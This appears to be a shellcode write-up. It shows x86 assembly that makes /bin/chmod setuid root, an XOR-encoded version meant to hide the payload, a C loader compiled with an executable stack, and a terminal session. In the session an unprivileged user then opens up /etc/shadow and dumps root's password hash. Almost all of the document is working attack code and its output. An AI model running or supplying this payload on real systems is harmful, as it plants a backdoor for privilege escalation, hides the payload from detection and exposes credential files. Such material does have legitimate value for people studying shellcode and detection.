- ASM that changes the permissions of /bin/chmod so that it becomes setuid:
- File chmod.asm:
- SECTION .text ; Code section: the instructions and the trailing path string both live here
- global _start ; Entry point exported to the linker
- _start: ; Program entry
- jmp callback ; Jump-call-pop: obtain the address of the trailing string without an absolute address
- programa:
- pop esi ; Pop the return address pushed by the call below; it points at the
- ; db string that follows the call ("/bin/chmod")
- xor ecx,ecx
- mov cx,0x89ED ; Arg #2, mode: 4755 (octal) = 0x9ED (hex); 0x89ED is the raw st_mode form, S_IFREG (0x8000) | 0x9ED
- ; +info: the stat command with %a / %f formats prints both forms; chmod keeps only the permission bits
- mov ebx,esi ; Arg #1, path of the file to change
- xor eax,eax
- mov al,0xf ; sys_chmod is syscall number 15 -> 0xF (32-bit int 0x80 ABI: eax=nr, ebx, ecx)
- ; arch/x86/include/generated/uapi/asm/unistd_32.h
- int 0x80 ; System call; the return value left in eax is never checked
- xor ebx,ebx ; Exit status 0 (arg #1 of exit): everything went fine
- xor eax,eax
- mov al,1 ; sys_exit
- int 0x80 ; System call
- callback:
- call programa ; Pushes the address of the db below as the return address, then enters programa
- db "/bin/chmod" ; No terminating NUL is emitted here: the kernel reads the path up to the first
- ; zero byte, so this depends on the byte that follows in memory being 0
- ######################################################################################
- XOR-encoded version that hides the real code:
- # nasm -f elf chmod.asm -o chmod.o
- # ld -o asmchmod chmod.o
- # objdump -M intel -d asmchmod | grep 80480 | grep -v '>:' | cut -f2 | perl -p -e 's/ [ \n]*//g'
- eb175e31c966b9ed8989f331c0b00fcd8031db31c0b001cd80e8e4ffffff2f62696e2f63686d6f64
- # ./parse.py xor eb175e31c966b9ed8989f331c0b00fcd8031db31c0b001cd80e8e4ffffff2f62696e2f63686d6f64 18
- f30f4629d17ea1f59191eb29d8a817d59829c329d8a819d598f0fce7e7e7377a7176377b7075777c
- File chmodxor.asm:
- SECTION .text ; Code section: the decoder and the encoded payload bytes both live here
- global _start ; Entry point exported to the linker
- _start: ; Program entry
- jmp callback ; Jump-call-pop: obtain the address of the encoded bytes
- programa:
- pop esi ; Pop the return address: it points at the encoded bytes after the call
- mov ebx,esi ; Keep the buffer start; it becomes the jump target once decoded
- ; XOR START
- xor ecx, ecx ; Counter = 0
- mov cl,40 ; Number of bytes to decode (matches the 40-byte db below)
- loopxor:
- mov al,[esi]
- xor al,18h ; Decode one byte with the key 0x18
- mov [esi],al ; Written back in place: this is a store into the code region, so it only
- ; works where that memory is writable and executable. In the ld-linked
- ; binary .text is normally read-only, which is why the bytes are later run
- ; from a writable array in the C loader instead
- inc esi ; Advance to the next byte
- dec cl ; Decrement the counter (sets ZF when it reaches 0)
- jnz loopxor
- ; XOR FINISH
- jmp ebx ; Transfer control to the decoded bytes (the chmod.asm code above)
- callback:
- call programa ; Pushes the address of the db below as the return address, then enters programa
- db 0f3h, 00fh, 046h, 029h, 0d1h, 07eh, 0a1h, 0f5h, 091h, 091h, 0ebh, 029h, 0d8h, 0a8h, 017h, 0d5h, 098h, 029h, 0c3h, 029h, 0d8h, 0a8h, 019h, 0d5h, 098h, 0f0h, 0fch, 0e7h, 0e7h, 0e7h, 037h, 07ah, 071h, 076h, 037h, 07bh, 070h, 075h, 077h, 07ch ; 40 bytes: the chmod.asm code XORed with 0x18
- ######################################################################################
- # nasm -f elf chmodxor.asm -o chmod.o
- # ld -o asmchmod chmod.o
- # objdump -M intel -d asmchmod | grep 80480 | grep -v '>:' | cut -f2 | perl -p -e 's/ [ \n]*//g'
- eb145e89f331c9b1288a063418880646fec975f5ffe3e8e7fffffff30f4629d17ea1f59191eb29d8a817d59829c329d8a819d598f0fce7e7e7377a7176377b7075777c
- # ./parse.py hex eb145e89f331c9b1288a063418880646fec975f5ffe3e8e7fffffff30f4629d17ea1f59191eb29d8a817d59829c329d8a819d598f0fce7e7e7377a7176377b7075777c
- \xeb\x14\x5e\x89\xf3\x31\xc9\xb1\x28\x8a\x06\x34\x18\x88\x06\x46\xfe\xc9\x75\xf5\xff\xe3\xe8\xe7\xff\xff\xff\xf3\x0f\x46\x29\xd1\x7e\xa1\xf5\x91\x91\xeb\x29\xd8\xa8\x17\xd5\x98\x29\xc3\x29\xd8\xa8\x19\xd5\x98\xf0\xfc\xe7\xe7\xe7\x37\x7a\x71\x76\x37\x7b\x70\x75\x77\x7c
- File shellcode.c:
- #include <unistd.h>
- /* 67-byte payload from chmodxor.asm: the 0x18-XOR decoder stub followed by the
-    encoded chmod("/bin/chmod", mode 0x89ED) code. It lives in a writable global so
-    the decoder's in-place stores succeed; executing from it additionally requires
-    the data mapping to be executable, which is what the `-z execstack` link flag
-    used below provides (on older 32-bit Linux the kernel then maps data as
-    executable too). That executable-stack/data property is the detectable trait. */
- unsigned char shellcode[] = \
- "\xeb\x14\x5e\x89\xf3\x31\xc9\xb1\x28\x8a\x06\x34\x18\x88\x06\x46\xfe\xc9\x75\xf5\xff\xe3\xe8\xe7\xff\xff\xff\xf3\x0f\x46\x29\xd1\x7e\xa1\xf5\x91\x91\xeb\x29\xd8\xa8\x17\xd5\x98\x29\xc3\x29\xd8\xa8\x19\xd5\x98\xf0\xfc\xe7\xe7\xe7\x37\x7a\x71\x76\x37\x7b\x70\x75\x77\x7c";
- /* Casts the byte array to a function pointer and calls it. `void main` is
-    non-standard (should be `int main`), and the call never returns normally
-    because the payload ends in sys_exit. */
- void main(){
- int (*ret)() = (int(*)()) shellcode;
- ret();}
- ######################################################################################
- # ls -l /bin/chmod
- -rwxr-xr-x 1 root root 54904 Jan 26 2013 /bin/chmod
- # su - prueba
- $ chmod 777 /etc/shadow
- chmod: changing permissions of `/etc/shadow': Operation not permitted
- $ exit
- exit
- # gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
- # ./shellcode
- # ls -l /bin/chmod
- -rwsr-xr-x 1 root root 54904 Jan 26 2013 /bin/chmod
- # su prueba
- $ chmod 777 /etc/shadow
- $ grep root /etc/shadow
- root:$6$jwJ6uky6$IHR7LyNfY6BpZiRd6cjVjiBtLyNfY5Y9N.gXN7B8t4FOtKRnZO5Y9NymHQus.3Ec7XaHJsdRYec77HnLyNfYM/:15992:0:99999:7:::
- $ echo "I change the hash and the salt in pastebin :-), now without execstack..."